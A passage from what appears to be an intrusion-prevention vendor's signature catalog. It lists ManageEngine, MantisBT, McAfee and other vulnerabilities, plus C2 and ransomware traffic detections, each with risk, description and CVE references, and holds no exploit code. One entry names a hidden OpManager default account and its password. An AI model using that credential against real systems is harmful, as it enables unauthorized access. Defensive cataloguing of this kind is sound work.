Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download

About this vulnerability:

A vulnerability in ManageEngine IT360

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine IT360; ManageEngine NetFlow

Type:

Input Validation

Description:

An arbitrary file download vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the schFilePath parameter sent to CSVServlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.

Situation:

HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download

References:

CVE-2014-5445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5445

BID-71404
http://www.securityfocus.com/bid/71404

OSVDB-115340
http://www.osvdb.org/115340

Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine IT360

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine IT360; ManageEngine NetFlow

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the filename parameter sent to the DisplayChartPDF servlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.

Situation:

HTTP_CSU-Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal

References:

CVE-2014-5446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5446

BID-71404
http://www.securityfocus.com/bid/71404

OSVDB-115339
http://www.osvdb.org/115339

Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine OpManager
Risk:	High
First detected in:	sgpkg-ips-673-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine OpManager
Type:	Input Validation
Description:	An SQL injection vulnerability exists in ManageEngine OpManager. This vulnerability is due to insufficient validation of the agentKey parameter when processing requests sent to "com.manageengine.opmanager.servlet.AgentDetailsUtil". A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation:	HTTP_CSU-Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection

Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine OpManager
Risk:	Moderate
First detected in:	sgpkg-ips-691-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine OpManager
Type:	Input Validation
Description:	There is an error in the processing of APMAlertOperationsServlet servlet, which allows an SQL injection.
Situation:	HTTP_CRL-Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection

Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine OpManager
Risk:	High
First detected in:	sgpkg-ips-796-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine OpManager
Type:	Input Validation
Description:	There exists an SQL injection vulnerability in ManageEngine OpManager. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection

Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078

About this vulnerability:

A vulnerability in ManageEngine OpManager

Risk:

High

First detected in:

sgpkg-ips-1510-5242

Last changed:

sgpkg-ips-1510-5242

Platform:

Generic

Software:

ManageEngine OpManager

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported in ManageEngine OpManager. An unauthenticated attacker can use this vulnerability to delete files and directories from the vulnerable server, possibly causing a denial of service condition.

Situation:

HTTP_CRL-Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078

References:

CVE-2021-20078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20078

Manageengine-Opmanager-SubmitQuery-IntegrationUser-Hidden-Administrator-Account

About this vulnerability:

A vulnerability in ManageEngine OpManager

Risk:

Moderate

First detected in:

sgpkg-ips-691-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine OpManager

Type:

Input Validation

Description:

ManageEngine OpManager has a default hidden administrator account "IntergrationUser" with default password "plugin". The password cannot be changed through the user interface. A remote attacker can login to OpManager using this hidden account and execute SQL commands.

Situation:

HTTP_CRL-Manageengine-Opmanager-SubmitQuery-SQL-Injection
HTTP_CRL-Manageengine-Opmanager-Hidden-Administrator-Account-Usage

References:

CVE-2015-7766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7766

Manageengine-Password-Manager-Pro-SQL-Injection

About this vulnerability:

A Manageengine Password Manager Pro SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-695-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine Password Manager Pro

Type:

SQL Injection

Description:

Multiple vulnerabilities in ManageEngine Password Manager Pro, before 7.1 build 7105, which allow remote attackers to execute arbitrary SQL commands via the SEARCH_ALL parameter to either SQLAdvancedALSearchResult.cc or AdvancedSearchResult.cc.

Situation:

HTTP_CRL-Manageengine-Password-Manager-Pro-SQL-Injection

References:

CVE-2014-8499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8499

BID-71018
http://www.securityfocus.com/bid/71018

OSVDB-114484
http://www.osvdb.org/114484

Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163

About this vulnerability:

An attempt to exploit a vulnerability in ManageEngine Recovery Manager Plus detected

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

ManageEngine Recovery Manager Plus

Type:

Malfunction

Description:

A stored Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Recovery Manager Plus before 5.3 allows remote authenticated users to inject arbitrary web script or HTML via the "loginName" field to "technicianAction.do".

Situation:

HTTP_CRL-Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163

References:

CVE-2018-9163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9163

Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection

About this vulnerability:

A ManageEngine Security Manager Plus Advanced Search SQL Injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-867-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ManageEngine Security Manager Plus

Type:

SQL Injection

Description:

An SQL injection vulnerability in ManageEngine Security Manager Plus, in the advanced search page, which can result in system level remote code execution.

Situation:

HTTP_CRL-Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection

References:

BID-56138
http://www.securityfocus.com/bid/56138

Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure

About this vulnerability:

A vulnerability in Zoho Corporation ManageEngine ServiceDesk

Risk:

Moderate

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Zoho Corporation ManageEngine ServiceDesk

Type:

Input Validation

Description:

There has been reported a directory traversal vulnerability in ManageEngine ServiceDesk for Microsoft Windows. This vulnerability could be exploited by a remote, unauthenticated attacker. Successful exploitation could lead to disclosure of arbitrary file contents from the target server.

Situation:

HTTP_CSU-Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure

References:

CVE-2017-11511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11511

Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Zoho Corporation ManageEngine ServiceDesk

Risk:

Moderate

First detected in:

sgpkg-ips-1032-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Zoho Corporation ManageEngine ServiceDesk

Type:

Directory Traversal

Description:

Improper handling of HTTP request paths causes a directory traversal vulnerability in Zoho Corporation ManageEngine ServiceDesk. A successful exploit allows an attacker to access arbitrary files on the target system.

Situation:

HTTP_CRL-Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal

References:

CVE-2017-11512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11512

Manageengine-Servicedesk-File-Upload-Directory-Traversal

About this vulnerability:	A vulnerability in ManageEngine ServiceDesk Plus
Risk:	Moderate
First detected in:	sgpkg-ips-686-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine ServiceDesk Plus
Type:	Directory Traversal
Description:	There is a directory traversal vulnerability in ManageEngine ServiceDesk. Zip-files with directory traversal structures may be used to upload and override arbitrary files in the target server.
Situation:	File-Zip_Manageengine-Servicedesk-File-Upload-Directory-Traversal

Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal

About this vulnerability:	A vulnerability in ManageEngine ServiceDesk Plus
Risk:	Moderate
First detected in:	sgpkg-ips-714-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine ServiceDesk Plus
Type:	Directory Traversal
Description:	Arbitrary files can be downloaded by exploiting a direcory traversal vulnerability in the ManageEngine ServiceDesk Plus product. The vulnerability is caused by insufficient sanitization of the fname parameter given in the request.
Situation:	HTTP_CRL-Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal

Manageengine-Servicedesk-Plus-User-Privileges-Bypass

About this vulnerability:

A vulnerability in ManageEngine ServiceDesk Plus

Risk:

Moderate

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine ServiceDesk Plus

Type:

Malfunction

Description:

A policy bypass vulnerability exists in ManageEngine ServiceDesk Plus. The vulnerability is due to a design weakness when handling certain URLs which require administrative access. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could lead to unauthorized access.

Situation:

HTTP_CRL-Manageengine-Servicedesk-Plus-User-Privileges-Bypass

References:

CVE-2015-1480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1480

BID-72302
http://www.securityfocus.com/bid/72302

OSVDB-117499
http://www.osvdb.org/117499

Mango-Automation-Scada/Hmi-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Mango Automation SCADA/HMI

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

Mango Automation SCADA/HMI

Type:

Cross-site Scripting

Description:

Cross Site Scripting vulnerabilities have been reported in data_point_details.shtm in Mango Automation 2.4.0 and earlier versions.

Situation:

HTTP_CRL-Mango-Automation-Scada-Cross-Site-Scripting

References:

CVE-2015-1179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1179

Manjusaka-C2-GET-Request

About this vulnerability:	Manjusaka command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1492-5242
Last changed:	sgpkg-ips-1492-5242
Platform:	Windows; Linux
Software:	<os>
Type:	Backdoor
Description:	An HTTP GET request that matches a known Manjusaka framework command and control traffic pattern was detected.
Situation:	HTTP_CS-Manjusaka-C2-GET-Request

Manolito-Peer-To-Peer-Network-Usage

About this vulnerability:	Manolito peer-to-peer network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Manolito
Type:	Peer-to-Peer
Description:	Manolito is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	P2P-TCP_Manolito-Network-Connect

Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Mantis Bug Tracker

Risk:

Moderate

First detected in:

sgpkg-ips-798-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mantis Bug Tracker

Type:

Input Validation

Description:

Insuffcient request validation results in a cross-site scripting vulnerability in Mantis Bug Tracker. A successful exploitation allows arbitary code to be run in the browser of an user.

Situation:

HTTP_CRL-Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting

References:

CVE-2016-6837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6837

Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset

About this vulnerability:

A vulnerability in Mantis MantisBT

Risk:

Moderate

First detected in:

sgpkg-ips-912-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MantisBT

Type:

Input Validation

Description:

Improper input validation on the confirm_hash parameter of a password reset request causes a password reset vulnerability in MantisBT. A successful exploit allows an attacker to make arbitrary changes to account passwords.

Situation:

HTTP_CS-Mantis-Bug-Tracker-Verify.PHP-Confirm_Hash-Remote-Password-Reset

References:

CVE-2017-7615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7615

Mantis-MantisBT-Bug-Tracker-Config_Report-Move_Attachments_Page-XSS

About this vulnerability:

A vulnerability in Mantis MantisBT

Risk:

Moderate

First detected in:

sgpkg-ips-872-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MantisBT

Type:

Input Validation

Description:

Improper handling of request values causes a cross-site scripting vulnerability in MantisBT. A successful exploitation allows an attacker to run arbitrary scripts in the client browser.

Situation:

HTTP_CRL-Mantis-MantisBT-Bug-Tracker_Config_Report-Move_Attachments_Page-XSS

References:

CVE-2017-7309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7309

MantisBT-Admin-SQL-Injection

About this vulnerability:

A MantisBT Admin SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MantisBT

Type:

SQL Injection

Description:

A vulnerability in the MantisBT, versions 1.2.13 through 1.2.16, in the manage configuration page adm_config_report.php, which allow remote attackers to execute arbitrary SQL commands via the filter_config_id parameter.

Situation:

HTTP_CRL_MantisBT-Admin-SQL-Injection

References:

CVE-2014-2238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2238

BID-65903
http://www.securityfocus.com/bid/65903

MantisBT-XmlImportExport-PHP-Code-Injection

About this vulnerability:

A MantisBT XmlImportExport PHP Code Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MantisBT

Type:

Misconfiguration

Description:

A vulnerability in MantisBT, versions 1.2.0a3 to 1.2.17, in the XmlImportExport plugin, which allows remote attachers to execute arbitrary PHP code via the description and issuelink field.

Situation:

HTTP_CS-MantisBT-XmlImportExport-PHP-Code-Injection

References:

CVE-2014-7146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7146

Manutharcs-Botnet

About this vulnerability:	Manutharcs botnet
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Manutharcs is a worm that infects Linux-based systems.
Situation:	Generic_CS-Manutharcs-Linux-Infection-Traffic

Mapurltozone-Security-Feature-Bypass-CVE-2025-21247

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1847-5242

Last changed:

sgpkg-ips-1847-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Windows MapUrlToZone security feature bypass vulnerability CVE-2025-21247.

Situation:

File-Text_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
File-Binary_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247

References:

CVE-2025-21247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21247

ms25-mar
http://technet.microsoft.com/security/bulletin/ms25-mar

MaraCMS-Arbitrary-PHP-File-Upload

About this vulnerability:

A vulnerability in MaraCMS

Risk:

High

First detected in:

sgpkg-ips-1292-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

MaraCMS

Type:

Insecure Configuration

Description:

There exists a vulnerability in MaraCMS, version 7.5, which allows remote attackers to execute arbitrary PHP code by uploading a malicious PHP file to the web root via an HTTP POST request to codebase/handler.php.

Situation:

HTTP_CS-MaraCMS-Arbitrary-PHP-File-Upload

References:

CVE-2020-25042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25042

Marketscore-OSSProxy-Internet-Accelerator-User-Agent

About this vulnerability:	Marketscore OSSProxy Internet Accelerator User Agent
Risk:	Low
First detected in:	sgpkg-ips-518-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	User-Agent from Marketscore (Netsetter) OSSProxy Internet Accelerator was detected. When installed, OSSProxy routes all Internet traffic through an unknown proxy. Using an unknown 3rd party proxy may lead to information disclosure.
Situation:	HTTP_CSH-Marketscore-OSSProxy-Internet-Accelerator-User-Agent

Maze-Ransomware-Traffic

About this vulnerability:	Maze ransomware traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1246-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Maze ransomware is able to encrypt all files in the infected system and network shares.
Situation:	HTTP_CS-Maze-Ransomware-Traffic

McAfee-Asset-Manager-Downloadreport-Information-Disclosure

About this vulnerability:

A vulnerability in McAfee Asset Manager

Risk:

Moderate

First detected in:

sgpkg-ips-573-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee Asset Manager

Type:

Directory Traversal

Description:

An information disclosure vulnerability has been reported in McAfee Asset Manager. The vulnerability is due to insufficient input validation on the "reportFileName" parameter of "downloadReport". A remote authenticated attacker can exploit this vulnerability to download arbitrary files from the server.

Situation:

HTTP_CRL-McAfee-Asset-Manager-Downloadreport-Information-Disclosure

References:

CVE-2014-2588
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2588

BID-66302
http://www.securityfocus.com/bid/66302

OSVDB-104633
http://www.osvdb.org/104633

McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error

About this vulnerability:

A vulnerability in McAfee Asset Manager

Risk:

Moderate

First detected in:

sgpkg-ips-577-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee Asset Manager

Type:

Input Validation

Description:

An input validation error vulnerability has been reported in McAfee Asset Manager. The vulnerability is due to insufficient input validation on the "user" parameter of "ReportsAudit.jsp". A remote authenticated attacker can exploit this vulnerability to execute SQL commands on the underlying database.

Situation:

HTTP_CSU-McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error

References:

CVE-2014-2587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2587

BID-66302
http://www.securityfocus.com/bid/66302

OSVDB-104634
http://www.osvdb.org/104634

McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal

About this vulnerability:

A vulnerability in McAfee Cloud Identity Manager

Risk:

High

First detected in:

sgpkg-ips-577-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

McAfee Cloud Identity Manager; McAfee Cloud Single Sign On; McAfee Intel Expressway Cloud Access 360-SSO

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in the ExtensionAccessServlet included in McAfee Cloud Single Sign On (formerly McAfee Cloud Identity Manager). A remote unauthenticated attacker can exploit this vulnerability to download arbitrary files from the server, including a file containing a hash of the product's administrator password.

Situation:

HTTP_CSU-McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal

References:

CVE-2014-2536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2536

BID-66181
http://www.securityfocus.com/bid/66181

OSVDB-104113
http://www.osvdb.org/104113

McAfee-e-Business-Server-Authentication-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in McAfee E-Business server

Risk:

Moderate

First detected in:

sgpkg-ips-226-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee e-Business Server

Type:

Buffer Overflow

Description:

McAfee E-Business Servers administration interface suffers from a buffer overflow vulnerability. Remote attackers can exploit the vulnerability by sending a long authentication packet that overflows a buffer and allows arbitrary code execution.

Situation:

McAfee_CS-McAfee-e-Business-Server-Authentication-Buffer-Overflow

References:

CVE-2008-0127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0127

BID-27197
http://www.securityfocus.com/bid/27197

McAfee-e-Business-Server-Authentication-Remote-Code-Execution

About this vulnerability:

Remote code execution prior authentication vulnerability

Risk:

High

First detected in:

sgpkg-ips-198-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee e-Business Server

Type:

Malfunction

Description:

McAfee E-Business Server is prone to a remote code-execution vulnerability that occurs prior to authentication. Successful exploits leads to remote compromise, failed exploits may lead to denial-of-service condition.

Situation:

McAfee_CS-McAfee-e-Business-Server-Authentication-Bypass

References:

CVE-2008-0127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0127

BID-27197
http://www.securityfocus.com/bid/27197

McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow

About this vulnerability:	McAfee ePolicy Orchestrator Agent Stack Overflow
Risk:	Moderate
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	McAfee ePolicy Orchestrator
Type:	Malfunction
Description:	There is a vulnerability in McAfee ePolicy Orchestrator.
Situation:	HTTP_CS-McAfee-Epolicy-Orchestrator-Agent-Stack-Overflow

McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection

About this vulnerability:

A vulnerability in McAfee ePolicy Orchestrator

Risk:

High

First detected in:

sgpkg-ips-859-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee ePolicy Orchestrator

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in McAfee ePolicy Orchestrator. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_McAfee-Epolicy-Orchestrator-Datachannel-Guid-SQL-Injection

References:

CVE-2016-8027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8027

McAfee-Epolicy-Orchestrator-Framework-Services-Format-String

About this vulnerability:

A format string vulnerability in McAfee Framework Services

Risk:

High

First detected in:

sgpkg-ips-149-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee Agent; McAfee Common Management Agent; McAfee ePolicy Orchestrator

Type:

Format String

Description:

There is a format string vulnerability in McAfee Framework Services. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious UDP packet with specially crafted Sender, Package, or Computer fields to terminate the affected service or to execute arbitrary code with the privileges of the affected service, normally System.

Situation:

Generic_UDP-McAfee-Epolicy-Orchestrator-Framework-Services-Format-String

References:

CVE-2008-1357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1357

BID-28228
http://www.securityfocus.com/bid/28228

OSVDB-42853
http://www.osvdb.org/42853

McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in McAfee Framework Services used in McAfee ePolicy Orchestrator and other products

Risk:

High

First detected in:

sgpkg-ips-151-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

McAfee ePolicy Orchestrator

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in McAfee Framework Services used in McAfee ePolicy Orchestrator and other products. A remote attacker can send an HTTP request containing an overly long HTTP request line to the target host to exploit this vulnerability. A successful attack leads to a denial of service or arbitrary code execution with the privileges of the affected service, which is normally System.

Situation:

HTTP_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow
Generic_CS-McAfee-Epolicy-Orchestrator-Framework-Services-HTTP-Buffer-Overflow

References:

CVE-2008-1855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1855

BID-28573
http://www.securityfocus.com/bid/28573

OSVDB-44161
http://www.osvdb.org/44161

McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting

About this vulnerability:

A vulnerability in McAfee ePolicy Orchestrator

Risk:

Moderate

First detected in:

sgpkg-ips-534-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee ePolicy Orchestrator

Type:

Input Validation

Description:

Multiple cross site scripting vulnerabilities exist in McAfee ePolicy Orchestrator. The vulnerabilities are due to insufficient input validation of various parameters submitted to pages of the affected device. This can result in reflected cross site scripting. A remote attacker could exploit these vulnerabilities by enticing an authenticated user to follow a specially crafted link. Successful exploitation could result in script code being executed in the browser of the enticed user.

Situation:

HTTP_CRL-McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting

References:

CVE-2013-4883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4883

OSVDB-95191
http://www.osvdb.org/95191

OSVDB-95190
http://www.osvdb.org/95190

OSVDB-95189
http://www.osvdb.org/95189

OSVDB-95188
http://www.osvdb.org/95188

OSVDB-95187
http://www.osvdb.org/95187

McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection

About this vulnerability:

A vulnerability in McAfee ePolicy Orchestrator

Risk:

Moderate

First detected in:

sgpkg-ips-535-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee ePolicy Orchestrator

Type:

SQL Injection

Description:

There are multiple SQL injection vulnerabilities in McAfee ePolicy Orchestrator. The vulnerabilities are due to insufficient input validation on the UID parameter of two URLs. A remote, authenticated attacker can exploit these vulnerabilities by sending specially crafted requests to the affected server. Successful exploitation could result in injected SQL code being executed on the database.

Situation:

HTTP_CRL-McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection

References:

CVE-2013-4882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4882

BID-61421
http://www.securityfocus.com/bid/61421

OSVDB-95192
http://www.osvdb.org/95192

McAfee-Epolicy-Orchestrator-XML-Entity-Injection

About this vulnerability:

A vulnerability in McAfee ePolicy Orchestrator

Risk:

High

First detected in:

sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee ePolicy Orchestrator

Type:

Input Validation

Description:

An XML External Entity vulnerability has been reported in McAfee ePolicy Orchestrator (ePO). The vulnerability is due to an input validation error in the ePO-web application. A remote attacker can exploit this vulnerability by sending a maliciously crafted XML dashboard definition. This can result in the disclosure of sensitive information.

Situation:

HTTP_CRL-McAfee-Epolicy-Orchestrator-XML-Entity-Injection

References:

CVE-2015-0921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0921

BID-71881
http://www.securityfocus.com/bid/71881

OSVDB-116855
http://www.osvdb.org/116855

McAfee-Epolicy-Orchestrator-Xml-External-Entity

About this vulnerability:

A vulnerability in McAfee ePolicy Orchestrator

Risk:

High

First detected in:

sgpkg-ips-593-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee ePolicy Orchestrator

Type:

Input Validation

Description:

An XML External Entity (XXE) vulnerability has been reported in McAfee ePolicy Orchestrator (ePO). The vulnerability is due to a design weakness in the ePO Web Console component. A remote attacker can exploit this vulnerability by sending a maliciously crafted XML dashboard definition. This can result in the disclosure of sensitive information.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2014-2205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2205

BID-65771
http://www.securityfocus.com/bid/65771

OSVDB-103717
http://www.osvdb.org/103717

McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in McAfee Firewall Reporter

Risk:

High

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Windows

Software:

McAfee Firewall Reporter

Type:

Input Validation

Description:

An authentication bypass vulnerability exists in McAfee Firewall. The vulnerability is due to a sanitization error in GeneralUtilities.pm while authenticating users. The vulnerable code does not properly validate session identifier values in HTTP requests. A remote unauthenticated attacker can leverage this vulnerability to gain access to restricted information or execute arbitrary code on a target system.

Situation:

HTTP_CSH-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
HTTP_CRL-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution

References:

BID-47306
http://www.securityfocus.com/bid/47306

OSVDB-71842
http://www.osvdb.org/71842

McAfee-FreeScan-Information-Disclosure

About this vulnerability:	A vulnerability in McAfee FreeScan
Risk:	High
First detected in:	sgpkg-ips-418-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows XP
Software:	McAfee FreeScan
Type:	Buffer Overflow
Description:	There is a vulnerability in a component of the McAfee's FreeScan service. An information disclosure vulnerability may allow remote attackers to gain file-system information, and can be used to obtain the username being used.
Situation:	File-Text_McAfee-FreeScan-Information-Disclosure

McAfee-Multiple-Products-Lha-Type-2-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in McAfee Active Mail Protection

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

McAfee VirusScan Enterprise

Type:

Input Validation

Description:

